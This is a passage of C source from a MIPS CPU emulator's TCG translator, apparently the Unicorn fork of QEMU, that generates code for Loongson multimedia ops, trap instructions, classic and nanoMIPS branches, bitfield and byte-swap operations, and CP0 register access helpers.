16); break; case OPC_PEXTRH: tcg_gen_andi_i64(tcg_ctx, t1, t1, 3); tcg_gen_shli_i64(tcg_ctx, t1, t1, 4); tcg_gen_shr_i64(tcg_ctx, t0, t0, t1); tcg_gen_ext16u_i64(tcg_ctx, t0, t0); break; case OPC_ADDU_CP2: tcg_gen_add_i64(tcg_ctx, t0, t0, t1); tcg_gen_ext32s_i64(tcg_ctx, t0, t0); break; case OPC_SUBU_CP2: tcg_gen_sub_i64(tcg_ctx, t0, t0, t1); tcg_gen_ext32s_i64(tcg_ctx, t0, t0); break; case OPC_SLL_CP2: shift_max = 32; goto do_shift; case OPC_SRL_CP2: shift_max = 32; goto do_shift; case OPC_SRA_CP2: shift_max = 32; goto do_shift; case OPC_DSLL_CP2: shift_max = 64; goto do_shift; case OPC_DSRL_CP2: shift_max = 64; goto do_shift; case OPC_DSRA_CP2: shift_max = 64; goto do_shift; do_shift: /* Make sure shift count isn't TCG undefined behaviour. */ tcg_gen_andi_i64(tcg_ctx, t1, t1, shift_max - 1); switch (opc) { case OPC_SLL_CP2: case OPC_DSLL_CP2: tcg_gen_shl_i64(tcg_ctx, t0, t0, t1); break; case OPC_SRA_CP2: case OPC_DSRA_CP2: /* * Since SRA is UndefinedResult without sign-extended inputs, * we can treat SRA and DSRA the same. */ tcg_gen_sar_i64(tcg_ctx, t0, t0, t1); break; case OPC_SRL_CP2: /* We want to shift in zeros for SRL; zero-extend first. */ tcg_gen_ext32u_i64(tcg_ctx, t0, t0); /* FALLTHRU */ case OPC_DSRL_CP2: tcg_gen_shr_i64(tcg_ctx, t0, t0, t1); break; } if (shift_max == 32) { tcg_gen_ext32s_i64(tcg_ctx, t0, t0); } /* Shifts larger than MAX produce zero. */ tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_LTU, t1, t1, shift_max); tcg_gen_neg_i64(tcg_ctx, t1, t1); tcg_gen_and_i64(tcg_ctx, t0, t0, t1); break; case OPC_ADD_CP2: case OPC_DADD_CP2: { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGLabel *lab = gen_new_label(tcg_ctx); tcg_gen_mov_i64(tcg_ctx, t2, t0); tcg_gen_add_i64(tcg_ctx, t0, t1, t2); if (opc == OPC_ADD_CP2) { tcg_gen_ext32s_i64(tcg_ctx, t0, t0); } tcg_gen_xor_i64(tcg_ctx, t1, t1, t2); tcg_gen_xor_i64(tcg_ctx, t2, t2, t0); tcg_gen_andc_i64(tcg_ctx, t1, t2, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_GE, t1, 0, lab); generate_exception(ctx, EXCP_OVERFLOW); gen_set_label(tcg_ctx, lab); break; } case OPC_SUB_CP2: case OPC_DSUB_CP2: { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGLabel *lab = gen_new_label(tcg_ctx); tcg_gen_mov_i64(tcg_ctx, t2, t0); tcg_gen_sub_i64(tcg_ctx, t0, t1, t2); if (opc == OPC_SUB_CP2) { tcg_gen_ext32s_i64(tcg_ctx, t0, t0); } tcg_gen_xor_i64(tcg_ctx, t1, t1, t2); tcg_gen_xor_i64(tcg_ctx, t2, t2, t0); tcg_gen_and_i64(tcg_ctx, t1, t1, t2); tcg_temp_free_i64(tcg_ctx, t2); tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_GE, t1, 0, lab); generate_exception(ctx, EXCP_OVERFLOW); gen_set_label(tcg_ctx, lab); break; } case OPC_PMULUW: tcg_gen_ext32u_i64(tcg_ctx, t0, t0); tcg_gen_ext32u_i64(tcg_ctx, t1, t1); tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); break; case OPC_SEQU_CP2: case OPC_SEQ_CP2: cond = TCG_COND_EQ; goto do_cc_cond; break; case OPC_SLTU_CP2: cond = TCG_COND_LTU; goto do_cc_cond; break; case OPC_SLT_CP2: cond = TCG_COND_LT; goto do_cc_cond; break; case OPC_SLEU_CP2: cond = TCG_COND_LEU; goto do_cc_cond; break; case OPC_SLE_CP2: cond = TCG_COND_LE; do_cc_cond: { int cc = (ctx->opcode >> 8) & 0x7; TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); TCGv_i32 t32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_setcond_i64(tcg_ctx, cond, t64, t0, t1); tcg_gen_extrl_i64_i32(tcg_ctx, t32, t64); tcg_gen_deposit_i32(tcg_ctx, tcg_ctx->fpu_fcr31, tcg_ctx->fpu_fcr31, t32, get_fp_bit(cc), 1); tcg_temp_free_i32(tcg_ctx, t32); tcg_temp_free_i64(tcg_ctx, t64); } goto no_rd; break; default: MIPS_INVAL("loongson_cp2"); generate_exception_end(ctx, EXCP_RI); return; } gen_store_fpr64(ctx, t0, rd); no_rd: tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* Traps */ static void gen_trap(DisasContext *ctx, uint32_t opc, int rs, int rt, int16_t imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int cond; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); cond = 0; /* Load needed operands */ switch (opc) { case OPC_TEQ: case OPC_TGE: case OPC_TGEU: case OPC_TLT: case OPC_TLTU: case OPC_TNE: /* Compare two registers */ if (rs != rt) { gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); cond = 1; } break; case OPC_TEQI: case OPC_TGEI: case OPC_TGEIU: case OPC_TLTI: case OPC_TLTIU: case OPC_TNEI: /* Compare register to immediate */ if (rs != 0 || imm != 0) { gen_load_gpr(tcg_ctx, t0, rs); tcg_gen_movi_tl(tcg_ctx, t1, (int32_t)imm); cond = 1; } break; } if (cond == 0) { switch (opc) { case OPC_TEQ: /* rs == rs */ case OPC_TEQI: /* r0 == 0 */ case OPC_TGE: /* rs >= rs */ case OPC_TGEI: /* r0 >= 0 */ case OPC_TGEU: /* rs >= rs unsigned */ case OPC_TGEIU: /* r0 >= 0 unsigned */ /* Always trap */ generate_exception_end(ctx, EXCP_TRAP); break; case OPC_TLT: /* rs < rs */ case OPC_TLTI: /* r0 < 0 */ case OPC_TLTU: /* rs < rs unsigned */ case OPC_TLTIU: /* r0 < 0 unsigned */ case OPC_TNE: /* rs != rs */ case OPC_TNEI: /* r0 != 0 */ /* Never trap: treat as NOP. */ break; } } else { TCGLabel *l1 = gen_new_label(tcg_ctx); switch (opc) { case OPC_TEQ: case OPC_TEQI: tcg_gen_brcond_tl(tcg_ctx, TCG_COND_NE, t0, t1, l1); break; case OPC_TGE: case OPC_TGEI: tcg_gen_brcond_tl(tcg_ctx, TCG_COND_LT, t0, t1, l1); break; case OPC_TGEU: case OPC_TGEIU: tcg_gen_brcond_tl(tcg_ctx, TCG_COND_LTU, t0, t1, l1); break; case OPC_TLT: case OPC_TLTI: tcg_gen_brcond_tl(tcg_ctx, TCG_COND_GE, t0, t1, l1); break; case OPC_TLTU: case OPC_TLTIU: tcg_gen_brcond_tl(tcg_ctx, TCG_COND_GEU, t0, t1, l1); break; case OPC_TNE: case OPC_TNEI: tcg_gen_brcond_tl(tcg_ctx, TCG_COND_EQ, t0, t1, l1); break; } generate_exception(ctx, EXCP_TRAP); gen_set_label(tcg_ctx, l1); } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static inline bool use_goto_tb(DisasContext *ctx, target_ulong dest) { if (unlikely(ctx->base.singlestep_enabled)) { return false; } return (ctx->base.tb->pc & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK); } static inline void gen_goto_tb(DisasContext *ctx, int n, target_ulong dest) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (use_goto_tb(ctx, dest)) { tcg_gen_goto_tb(tcg_ctx, n); gen_save_pc(tcg_ctx, dest); tcg_gen_exit_tb(tcg_ctx, ctx->base.tb, n); } else { gen_save_pc(tcg_ctx, dest); if (ctx->base.singlestep_enabled) { save_cpu_state(ctx, 0); gen_helper_raise_exception_debug(tcg_ctx, tcg_ctx->cpu_env); } tcg_gen_lookup_and_goto_ptr(tcg_ctx); } } /* Branches (before delay slot) */ static void gen_compute_branch(DisasContext *ctx, uint32_t opc, int insn_bytes, int rs, int rt, int32_t offset, int delayslot_size) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong btgt = -1; int blink = 0; int bcond_compute = 0; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); if (ctx->hflags & MIPS_HFLAG_BMASK) { #ifdef MIPS_DEBUG_DISAS LOG_DISAS("Branch in delay / forbidden slot at PC 0x" TARGET_FMT_lx "\n", ctx->base.pc_next); #endif generate_exception_end(ctx, EXCP_RI); goto out; } /* Load needed operands */ switch (opc) { case OPC_BEQ: case OPC_BEQL: case OPC_BNE: case OPC_BNEL: /* Compare two registers */ if (rs != rt) { gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); bcond_compute = 1; } btgt = ctx->base.pc_next + insn_bytes + offset; break; case OPC_BGEZ: case OPC_BGEZAL: case OPC_BGEZALL: case OPC_BGEZL: case OPC_BGTZ: case OPC_BGTZL: case OPC_BLEZ: case OPC_BLEZL: case OPC_BLTZ: case OPC_BLTZAL: case OPC_BLTZALL: case OPC_BLTZL: /* Compare to zero */ if (rs != 0) { gen_load_gpr(tcg_ctx, t0, rs); bcond_compute = 1; } btgt = ctx->base.pc_next + insn_bytes + offset; break; case OPC_BPOSGE32: #if defined(TARGET_MIPS64) case OPC_BPOSGE64: tcg_gen_andi_tl(tcg_ctx, t0, tcg_ctx->cpu_dspctrl, 0x7F); #else tcg_gen_andi_tl(tcg_ctx, t0, tcg_ctx->cpu_dspctrl, 0x3F); #endif bcond_compute = 1; btgt = ctx->base.pc_next + insn_bytes + offset; break; case OPC_J: case OPC_JAL: case OPC_JALX: /* Jump to immediate */ btgt = ((ctx->base.pc_next + insn_bytes) & (int32_t)0xF0000000) | (uint32_t)offset; break; case OPC_JR: case OPC_JALR: /* Jump to register */ if (offset != 0 && offset != 16) { /* * Hint = 0 is JR/JALR, hint 16 is JR.HB/JALR.HB, the * others are reserved. */ MIPS_INVAL("jump hint"); generate_exception_end(ctx, EXCP_RI); goto out; } gen_load_gpr(tcg_ctx, tcg_ctx->btarget, rs); break; default: MIPS_INVAL("branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } if (bcond_compute == 0) { /* No condition to be computed */ switch (opc) { case OPC_BEQ: /* rx == rx */ case OPC_BEQL: /* rx == rx likely */ case OPC_BGEZ: /* 0 >= 0 */ case OPC_BGEZL: /* 0 >= 0 likely */ case OPC_BLEZ: /* 0 <= 0 */ case OPC_BLEZL: /* 0 <= 0 likely */ /* Always take */ ctx->hflags |= MIPS_HFLAG_B; break; case OPC_BGEZAL: /* 0 >= 0 */ case OPC_BGEZALL: /* 0 >= 0 likely */ /* Always take and link */ blink = 31; ctx->hflags |= MIPS_HFLAG_B; break; case OPC_BNE: /* rx != rx */ case OPC_BGTZ: /* 0 > 0 */ case OPC_BLTZ: /* 0 < 0 */ /* Treat as NOP. */ goto out; case OPC_BLTZAL: /* 0 < 0 */ /* * Handle as an unconditional branch to get correct delay * slot checking. */ blink = 31; btgt = ctx->base.pc_next + insn_bytes + delayslot_size; ctx->hflags |= MIPS_HFLAG_B; break; case OPC_BLTZALL: /* 0 < 0 likely */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[31], ctx->base.pc_next + 8); /* Skip the instruction in the delay slot */ ctx->base.pc_next += 4; goto out; case OPC_BNEL: /* rx != rx likely */ case OPC_BGTZL: /* 0 > 0 likely */ case OPC_BLTZL: /* 0 < 0 likely */ /* Skip the instruction in the delay slot */ ctx->base.pc_next += 4; goto out; case OPC_J: ctx->hflags |= MIPS_HFLAG_B; break; case OPC_JALX: ctx->hflags |= MIPS_HFLAG_BX; /* Fallthrough */ case OPC_JAL: blink = 31; ctx->hflags |= MIPS_HFLAG_B; break; case OPC_JR: ctx->hflags |= MIPS_HFLAG_BR; break; case OPC_JALR: blink = rt; ctx->hflags |= MIPS_HFLAG_BR; break; default: MIPS_INVAL("branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } } else { switch (opc) { case OPC_BEQ: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->bcond, t0, t1); goto not_likely; case OPC_BEQL: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->bcond, t0, t1); goto likely; case OPC_BNE: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->bcond, t0, t1); goto not_likely; case OPC_BNEL: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->bcond, t0, t1); goto likely; case OPC_BGEZ: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->bcond, t0, 0); goto not_likely; case OPC_BGEZL: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->bcond, t0, 0); goto likely; case OPC_BGEZAL: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->bcond, t0, 0); blink = 31; goto not_likely; case OPC_BGEZALL: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->bcond, t0, 0); blink = 31; goto likely; case OPC_BGTZ: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GT, tcg_ctx->bcond, t0, 0); goto not_likely; case OPC_BGTZL: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GT, tcg_ctx->bcond, t0, 0); goto likely; case OPC_BLEZ: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LE, tcg_ctx->bcond, t0, 0); goto not_likely; case OPC_BLEZL: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LE, tcg_ctx->bcond, t0, 0); goto likely; case OPC_BLTZ: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->bcond, t0, 0); goto not_likely; case OPC_BLTZL: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->bcond, t0, 0); goto likely; case OPC_BPOSGE32: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->bcond, t0, 32); goto not_likely; #if defined(TARGET_MIPS64) case OPC_BPOSGE64: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->bcond, t0, 64); goto not_likely; #endif case OPC_BLTZAL: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->bcond, t0, 0); blink = 31; not_likely: ctx->hflags |= MIPS_HFLAG_BC; break; case OPC_BLTZALL: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->bcond, t0, 0); blink = 31; likely: ctx->hflags |= MIPS_HFLAG_BL; break; default: MIPS_INVAL("conditional branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } } ctx->btarget = btgt; switch (delayslot_size) { case 2: ctx->hflags |= MIPS_HFLAG_BDS16; break; case 4: ctx->hflags |= MIPS_HFLAG_BDS32; break; } if (blink > 0) { int post_delay = insn_bytes + delayslot_size; int lowbit = !!(ctx->hflags & MIPS_HFLAG_M16); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[blink], ctx->base.pc_next + post_delay + lowbit); } out: if (insn_bytes == 2) { ctx->hflags |= MIPS_HFLAG_B16; } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } /* nanoMIPS Branches */ static void gen_compute_branch_nm(DisasContext *ctx, uint32_t opc, int insn_bytes, int rs, int rt, int32_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong btgt = -1; int bcond_compute = 0; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); /* Load needed operands */ switch (opc) { case OPC_BEQ: case OPC_BNE: /* Compare two registers */ if (rs != rt) { gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); bcond_compute = 1; } btgt = ctx->base.pc_next + insn_bytes + offset; break; case OPC_BGEZAL: /* Compare to zero */ if (rs != 0) { gen_load_gpr(tcg_ctx, t0, rs); bcond_compute = 1; } btgt = ctx->base.pc_next + insn_bytes + offset; break; case OPC_BPOSGE32: tcg_gen_andi_tl(tcg_ctx, t0, tcg_ctx->cpu_dspctrl, 0x3F); bcond_compute = 1; btgt = ctx->base.pc_next + insn_bytes + offset; break; case OPC_JR: case OPC_JALR: /* Jump to register */ if (offset != 0 && offset != 16) { /* * Hint = 0 is JR/JALR, hint 16 is JR.HB/JALR.HB, the * others are reserved. */ MIPS_INVAL("jump hint"); generate_exception_end(ctx, EXCP_RI); goto out; } gen_load_gpr(tcg_ctx, tcg_ctx->btarget, rs); break; default: MIPS_INVAL("branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } if (bcond_compute == 0) { /* No condition to be computed */ switch (opc) { case OPC_BEQ: /* rx == rx */ /* Always take */ ctx->hflags |= MIPS_HFLAG_B; break; case OPC_BGEZAL: /* 0 >= 0 */ /* Always take and link */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[31], ctx->base.pc_next + insn_bytes); ctx->hflags |= MIPS_HFLAG_B; break; case OPC_BNE: /* rx != rx */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[31], ctx->base.pc_next + 8); /* Skip the instruction in the delay slot */ ctx->base.pc_next += 4; goto out; case OPC_JR: ctx->hflags |= MIPS_HFLAG_BR; break; case OPC_JALR: if (rt > 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], ctx->base.pc_next + insn_bytes); } ctx->hflags |= MIPS_HFLAG_BR; break; default: MIPS_INVAL("branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } } else { switch (opc) { case OPC_BEQ: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->bcond, t0, t1); goto not_likely; case OPC_BNE: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->bcond, t0, t1); goto not_likely; case OPC_BGEZAL: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->bcond, t0, 0); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[31], ctx->base.pc_next + insn_bytes); goto not_likely; case OPC_BPOSGE32: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->bcond, t0, 32); not_likely: ctx->hflags |= MIPS_HFLAG_BC; break; default: MIPS_INVAL("conditional branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } } ctx->btarget = btgt; out: if (insn_bytes == 2) { ctx->hflags |= MIPS_HFLAG_B16; } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } /* special3 bitfield operations */ static void gen_bitops(DisasContext *ctx, uint32_t opc, int rt, int rs, int lsb, int msb) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t1, rs); switch (opc) { case OPC_EXT: if (lsb + msb > 31) { goto fail; } if (msb != 31) { tcg_gen_extract_tl(tcg_ctx, t0, t1, lsb, msb + 1); } else { /* * The two checks together imply that lsb == 0, * so this is a simple sign-extension. */ tcg_gen_ext32s_tl(tcg_ctx, t0, t1); } break; #if defined(TARGET_MIPS64) case OPC_DEXTU: lsb += 32; goto do_dext; case OPC_DEXTM: msb += 32; goto do_dext; case OPC_DEXT: do_dext: if (lsb + msb > 63) { goto fail; } tcg_gen_extract_tl(tcg_ctx, t0, t1, lsb, msb + 1); break; #endif case OPC_INS: if (lsb > msb) { goto fail; } gen_load_gpr(tcg_ctx, t0, rt); tcg_gen_deposit_tl(tcg_ctx, t0, t0, t1, lsb, msb - lsb + 1); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); break; #if defined(TARGET_MIPS64) case OPC_DINSU: lsb += 32; /* FALLTHRU */ case OPC_DINSM: msb += 32; /* FALLTHRU */ case OPC_DINS: if (lsb > msb) { goto fail; } gen_load_gpr(tcg_ctx, t0, rt); tcg_gen_deposit_tl(tcg_ctx, t0, t0, t1, lsb, msb - lsb + 1); break; #endif default: fail: MIPS_INVAL("bitops"); generate_exception_end(ctx, EXCP_RI); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); return; } gen_store_gpr(tcg_ctx, t0, rt); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void gen_bshfl(DisasContext *ctx, uint32_t op2, int rt, int rd) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; if (rd == 0) { /* If no destination, treat it as a NOP. */ return; } t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); switch (op2) { case OPC_WSBH: { TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_const_tl(tcg_ctx, 0x00FF00FF); tcg_gen_shri_tl(tcg_ctx, t1, t0, 8); tcg_gen_and_tl(tcg_ctx, t1, t1, t2); tcg_gen_and_tl(tcg_ctx, t0, t0, t2); tcg_gen_shli_tl(tcg_ctx, t0, t0, 8); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); } break; case OPC_SEB: tcg_gen_ext8s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); break; case OPC_SEH: tcg_gen_ext16s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); break; #if defined(TARGET_MIPS64) case OPC_DSBH: { TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_const_tl(tcg_ctx, 0x00FF00FF00FF00FFULL); tcg_gen_shri_tl(tcg_ctx, t1, t0, 8); tcg_gen_and_tl(tcg_ctx, t1, t1, t2); tcg_gen_and_tl(tcg_ctx, t0, t0, t2); tcg_gen_shli_tl(tcg_ctx, t0, t0, 8); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t1); } break; case OPC_DSHD: { TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_const_tl(tcg_ctx, 0x0000FFFF0000FFFFULL); tcg_gen_shri_tl(tcg_ctx, t1, t0, 16); tcg_gen_and_tl(tcg_ctx, t1, t1, t2); tcg_gen_and_tl(tcg_ctx, t0, t0, t2); tcg_gen_shli_tl(tcg_ctx, t0, t0, 16); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); tcg_gen_shri_tl(tcg_ctx, t1, t0, 32); tcg_gen_shli_tl(tcg_ctx, t0, t0, 32); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t1); } break; #endif default: MIPS_INVAL("bsfhl"); generate_exception_end(ctx, EXCP_RI); tcg_temp_free(tcg_ctx, t0); return; } tcg_temp_free(tcg_ctx, t0); } static void gen_lsa(DisasContext *ctx, int opc, int rd, int rs, int rt, int imm2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; TCGv t1; if (rd == 0) { /* Treat as NOP. */ return; } t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_shli_tl(tcg_ctx, t0, t0, imm2 + 1); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); if (opc == OPC_LSA) { tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); } tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); return; } static void gen_align_bits(DisasContext *ctx, int wordsz, int rd, int rs, int rt, int bits) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; if (rd == 0) { /* Treat as NOP. */ return; } t0 = tcg_temp_new(tcg_ctx); if (bits == 0 || bits == wordsz) { if (bits == 0) { gen_load_gpr(tcg_ctx, t0, rt); } else { gen_load_gpr(tcg_ctx, t0, rs); } switch (wordsz) { case 32: tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); break; #if defined(TARGET_MIPS64) case 64: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); break; #endif } } else { TCGv t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_load_gpr(tcg_ctx, t1, rs); switch (wordsz) { case 32: { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_tl_i64(tcg_ctx, t2, t1, t0); tcg_gen_shri_i64(tcg_ctx, t2, t2, 32 - bits); gen_move_low32(tcg_ctx, tcg_ctx->cpu_gpr[rd], t2); tcg_temp_free_i64(tcg_ctx, t2); } break; #if defined(TARGET_MIPS64) case 64: tcg_gen_shli_tl(tcg_ctx, t0, t0, bits); tcg_gen_shri_tl(tcg_ctx, t1, t1, 64 - bits); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t1, t0); break; #endif } tcg_temp_free(tcg_ctx, t1); } tcg_temp_free(tcg_ctx, t0); } static void gen_align(DisasContext *ctx, int wordsz, int rd, int rs, int rt, int bp) { gen_align_bits(ctx, wordsz, rd, rs, rt, bp * 8); } static void gen_ext(DisasContext *ctx, int wordsz, int rd, int rs, int rt, int shift) { gen_align_bits(ctx, wordsz, rd, rs, rt, wordsz - shift); } static void gen_bitswap(DisasContext *ctx, int opc, int rd, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; if (rd == 0) { /* Treat as NOP. */ return; } t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); switch (opc) { case OPC_BITSWAP: gen_helper_bitswap(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); break; #if defined(TARGET_MIPS64) case OPC_DBITSWAP: gen_helper_dbitswap(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); break; #endif } tcg_temp_free(tcg_ctx, t0); } /* CP0 (MMU and control) */ static inline void gen_mthc0_entrylo(TCGContext *tcg_ctx, TCGv arg, target_ulong off) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_tl_i64(tcg_ctx, t0, arg); tcg_gen_ld_i64(tcg_ctx, t1, tcg_ctx->cpu_env, off); #if defined(TARGET_MIPS64) tcg_gen_deposit_i64(tcg_ctx, t1, t1, t0, 30, 32); #else tcg_gen_concat32_i64(tcg_ctx, t1, t1, t0); #endif tcg_gen_st_i64(tcg_ctx, t1, tcg_ctx->cpu_env, off); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t0); } static inline void gen_mthc0_store64(TCGContext *tcg_ctx, TCGv arg, target_ulong off) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_tl_i64(tcg_ctx, t0, arg); tcg_gen_ld_i64(tcg_ctx, t1, tcg_ctx->cpu_env, off); tcg_gen_concat32_i64(tcg_ctx, t1, t1, t0); tcg_gen_st_i64(tcg_ctx, t1, tcg_ctx->cpu_env, off); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t0); } static inline void gen_mfhc0_entrylo(TCGContext *tcg_ctx, TCGv arg, target_ulong off) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, t0, tcg_ctx->cpu_env, off); #if defined(TARGET_MIPS64) tcg_gen_shri_i64(tcg_ctx, t0, t0, 30); #else tcg_gen_shri_i64(tcg_ctx, t0, t0, 32); #endif gen_move_low32(tcg_ctx, arg, t0); tcg_temp_free_i64(tcg_ctx, t0); } static inline void gen_mfhc0_load64(TCGContext *tcg_ctx, TCGv arg, target_ulong off, int shift) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, t0, tcg_ctx->cpu_env, off); tcg_gen_shri_i64(tcg_ctx, t0, t0, 32 + shift); gen_move_low32(tcg_ctx, arg, t0); tcg_temp_free_i64(tcg_ctx, t0); } static inline void gen_mfc0_load32(TCGContext *tcg_ctx, TCGv arg, target_ulong off) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, t0, tcg_ctx->cpu_env, off); tcg_gen_ext_i32_tl(tcg_ctx, arg, t0); tcg_temp_free_i32(tcg_ctx, t0); } static inline void gen_mfc0_load64(TCGContext *tcg_ctx, TCGv arg, target_ulong off) { tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, off); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); } static inline void gen_mtc0_store32(TCGContext *tcg_ctx, TCGv arg, target_ulong off) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t0, arg); tcg_gen_st_i32(tcg_ctx, t0, tcg_ctx->cpu_env, off); tcg_temp_free_i32(tcg_ctx, t0); } #define CP0_CHECK(c) \ do { \ if (!(c)) { \ goto cp0_unimplemented; \ } \ } while (0) static void 